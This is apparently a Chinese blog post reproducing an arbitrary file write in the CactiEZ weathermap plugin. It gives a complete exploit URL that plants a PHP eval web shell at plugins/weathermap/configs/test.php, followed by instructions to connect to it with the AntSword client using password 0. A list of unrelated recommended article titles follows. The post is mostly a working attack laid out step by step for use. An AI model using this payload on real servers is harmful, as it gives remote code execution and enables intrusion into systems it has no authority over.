漏洞特征

CactiEZ的登录界面,大多数都会存在weathermap的插件,这样我们就可以尝试该网站是否存在任意文件写入漏洞了

漏洞复现

我们直接在url处进行文件写入命令的操作即可。

/plugins/weathermap/editor.php?plug=0&mapname=test.php&action=set_map_properties&param=&param2=&debug=existing&node_name=&node_x=&node_y=&node_new_name=&node_label=&node_infourl=&node_hover=&node_iconfilename=--NONE--&link_name=&link_bandwidth_in=&link_bandwidth_out=&link_target=&link_width=&link_infourl=&link_hover=&map_title=<?php echo(md5(1));@eval($_POST[0]);?>&map_legend=Traffic+Load&map_stamp=Created:+%b+%d+%Y+%H:%M:%S&map_linkdefaultwidth=7&map_linkdefaultbwin=100M&map_linkdefaultbwout=100M&map_width=800&map_height=600&map_pngfile=&map_htmlfile=&map_bgfile=--NONE--&mapstyle_linklabels=percent&mapstyle_htmlstyle=overlib&mapstyle_arrowstyle=classic&mapstyle_nodefont=3&mapstyle_linkfont=2&mapstyle_legendfont=4&item_configtext=Name

这时候我们访问特点的url即可看见我们的shell

http://**.**.**.**/plugins/weathermap/configs/test.php

 这时候我们使用蚁剑去连接,密码是0,即可顺利连接上靶机。

http://**.**.**.**/plugins/weathermap/configs/test.php

CactiEZ weathermap插件任意文件写入相关推荐

  1. Linux使用445端口,利用enum4linux 445端口+wordpress插件任意文件上传的一次渗透

    探测内网80端口发现目标IP 目标使用Apache  2.4.7web服务中间件 使用linux    Ubuntu系统 使用御剑扫描了目录 目录扫描到了 对192.168.31.236/wordpr ...

  2. 【安全狐】CVE-2016-3088_ActiveMQ任意文件写入漏洞

    CVE-2016-3088_ActiveMQ任意文件写入漏洞 0x01漏洞背景 ActiveMQ的web控制台分三个应用,admin.api和fileserver,其中admin是管理员页面,api是 ...

  3. ThinkCMF任意文件写入漏洞----学习记录

    ThinkCMF框架任意文件写入漏洞 一.ThinkCMF介绍: ThinkCMF是一款基于ThinkPHP+MYSQL开发的中文内容管理框架.ThinkCMF提出灵活的应用机制,框架自身提供基础的管 ...

  4. 修复路径穿越、任意文件写入漏洞

    修复路径穿越.任意文件写入漏洞 背景 前段时间随手写的一个文件上传服务,在公司的渗透测试下漏洞百出,其中少不了路径穿越和任意文件写入漏洞.其实这两个漏洞的修复并不复杂,只要对入参进行两个条件的校验就可 ...

  5. 08 - vulhub - Aria2 任意文件写入漏洞

    文章目录 漏洞名称:Aria2 任意文件写入漏洞 漏洞原理 漏洞复现 漏洞利用限制 环境准备 漏洞利用 验证漏洞利用是否成功并反弹 修复建议 漏洞名称:Aria2 任意文件写入漏洞 简介: Aria2 ...

  6. Aria2任意文件写入漏洞 漏洞复现

    Aria2任意文件写入漏洞 by ADummy 0x00利用路线 ​ 第三方UI与目标进行通信->搭建http服务器->让目标下载恶意文件->定时任务执行->反弹shell 0 ...

  7. 锐捷某系统前台任意文件写入漏洞分析

    0x00前言 这套系统我估计是全网第一个公开能拿shell的吧(不是的话当我没说),哪套系统自己猜,这次先分享下前台任意文件写入,还有几个rce日后分享,也感谢独立团孙德胜Alan提供的思路. 0x0 ...

  8. 致远a8-v5-6.0协同管理软件_高危漏洞利用预警:近期利用“致远OA任意文件写入漏洞”的攻击较多...

    概述腾讯御界高级威胁检测系统近期监测到"致远OA系统上的GetShell漏洞"在网上被频繁利用攻击政企客户. 对于存在漏洞的OA系统,攻击者无需任何权限,即可向服务器上传websh ...

  9. linux调用ocx插件_Wordpress file manager插件任意文件上传

    白斩鸡@卫兵实验室 近日,Wordpress 插件file manager被爆出严重0day漏洞,本着技术研究角度,和大家分享.探讨其漏洞原因. 该修复程序已在同一天发布,并且WP File Mana ...

最新文章

  1. MySQL(三)用正则表达式搜索
  2. 【C语言】07-预处理指令;-宏定义
  3. matlab一句一句调试,matlab程序怎样调试和运行
  4. 中国SaaS死或生之七:死生非大事,利益最相关
  5. Pycharm远程调试之ssh remote debug(二)
  6. SharePoint创建登录表单
  7. 电商产品经理:如何搭建会员管理体系(多图干货)
  8. VAX 的使用快捷键
  9. Cocos游戏打包apk
  10. 关于计算机的CPU的发展历史,计算机CPU的全部发展历史
  11. c语言中指针用法初级,C语言中各类指针的用法(小结)
  12. 培养下一个埃隆马斯克?AI+教育可以成为好起点
  13. html图片文字环绕
  14. 广义表和二叉树的转换
  15. 第三方网页应用对接飞书Java版
  16. 应急管理部启动低温雨雪冰冻天气应急响应
  17. Ngnix之父突然离职,程序员巅峰一代落幕
  18. Don't rely on luck.
  19. 对计算机会计上机课的心得,浅谈高职会计电算化实训课程|会计电算化心得2000字...
  20. LMS算法的C语言实现

热门文章

  1. a类计算机房的安全需求,安防知识:弱电机房建设分类及要求
  2. 《伯恩斯新情绪》压力下情绪控制方法
  3. 基于SECS协议开发的简明教程(7)
  4. word --- 如何设置word里的代码格式,使之有底纹的效果
  5. 双十一广告弹窗问题找到了!金山词霸,原来是你!
  6. IDEA 返回上一步、下一步 Back ← Forward → 快捷键失效问题解决
  7. Linux /etc/shadow文件含义
  8. List、Set、Map的特点及遍历方法
  9. Swan Song 第十一周Scrum Meeting
  10. 公安大学c语言真题,2016年中国人民公安大学网络安全与执法C语言程序设计(同等学力加试)复试笔试仿真模拟题...